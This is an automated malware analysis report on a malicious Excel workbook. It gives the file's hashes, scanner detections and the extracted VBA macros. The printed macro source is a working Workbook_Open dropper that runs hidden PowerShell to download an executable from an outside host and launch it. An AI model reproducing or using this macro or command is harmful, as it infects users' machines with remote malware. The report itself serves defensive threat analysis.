Office (OOXML) / .XLSX malware analysis — malicious · f8eb204e21881b21

MALICIOUS

Office (OOXML) / .XLSX

41.7 KB Created: 2020-01-28 19:47:00 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2026-06-12

MD5: ea9b5647633232abc23a64a0a161e384 SHA-1: a8d0b89174421b4d2850f1f7c23f77e2bc257d0c SHA-256: f8eb204e21881b21028c96876f7dae678d963a695d83eb65aff6e7f2ef9fcf01

398 Risk Score

Heuristics 10

ClamAV: Xls.Dropper.EPPlus-9802867-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Dropper.EPPlus-9802867-2
VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

Debug.Print sCommand
Set oWshShell = CreateObject("WScript.Shell")
Set oWshShellExec = oWshShell.Exec(sCommand)

PowerShell reference in VBA critical OLE_VBA_PS

PowerShell reference in VBA

Matched line in script

Dim oWshShell As Object, oWshShellExec As Object
sCommand = "powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() | Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri ""https://dikatafarm.co.za/lika/may30.exe"" -OutFile $TempFile; Start-Process $TempFile;
Debug.Print sCommand

VBA stages a PowerShell/LOLBin download-and-run command critical OLE_VBA_BITSTRANSFER_DROPPER

The macro assembles a download command using a PowerShell or LOLBin download primitive (Start-BitsTransfer, Invoke-WebRequest, Net.WebClient, bitsadmin, certutil, ...) that fetches a remote payload, then executes it -- writing it to a script file and running it, or launching it directly from an auto-exec handler. The keywords are commonly split with PowerShell backtick / cmd caret escapes to evade scanners; this detection de-escapes the source first. A high-confidence downloader/dropper, stronger than the individual Shell / download keywords on their own.
Matched line in script
```
Private Sub Workbook_Open()
Dim sCommand As String, sOutput As String
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

Debug.Print sCommand
Set oWshShell = CreateObject("WScript.Shell")
Set oWshShellExec = oWshShell.Exec(sCommand)

Workbook_Open macro low OLE_VBA_WBOPEN

Workbook_Open macro
Matched line in script
```
Private Sub Workbook_Open()
Dim sCommand As String, sOutput As String
```
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
External hyperlinks (3) low OOXML_EXTERNAL_HYPERLINKS

Document contains 3 external hyperlinks — clickable URLs are stored as external relationships. First target: http://go.microsoft.com/fwlink/?LinkId=846285
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL https://dikatafarm.co.za/lika/may30.exe In document text (OOXML body / shared strings)
- http://go.microsoft.com/fwlink/?LinkId=846285Document hyperlink
- http://go.microsoft.com/fwlink/?LinkId=844969Document hyperlink
- http://go.microsoft.com/fwlink/?LinkId=846286Document hyperlink

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1549 bytes
SHA-256: `c286a13569caccf3460a296501c749fff93c84f3f2bdee67b9f1b351281a55a8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_Open() Dim sCommand As String, sOutput As String Dim oWshShell As Object, oWshShellExec As Object sCommand = "powershell -WindowStyle hidden -executionpolicy bypass; $TempFile = [IO.Path]::GetTempFileName() \| Rename-Item -NewName { $_ -replace 'tmp$', 'exe' } –PassThru; Invoke-WebRequest -Uri ""https://dikatafarm.co.za/lika/may30.exe"" -OutFile $TempFile; Start-Process $TempFile; Debug.Print sCommand Set oWshShell = CreateObject("WScript.Shell") Set oWshShellExec = oWshShell.Exec(sCommand) sOutput = oWshShellExec.StdOut.ReadAll 'MsgBox (sOutput) Set oWshShellExec = Nothing Set oWshShell = Nothing End Sub Attribute VB_Name = "Start" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Learn more" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	5632 bytes
SHA-256: `3cb5de5591bd20cfe3228e772a1c550a18e4506881a7f0f3c3e065bef9aad9f8`
Detection ClamAV: Xls.Dropper.EPPlus-9802867-2 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.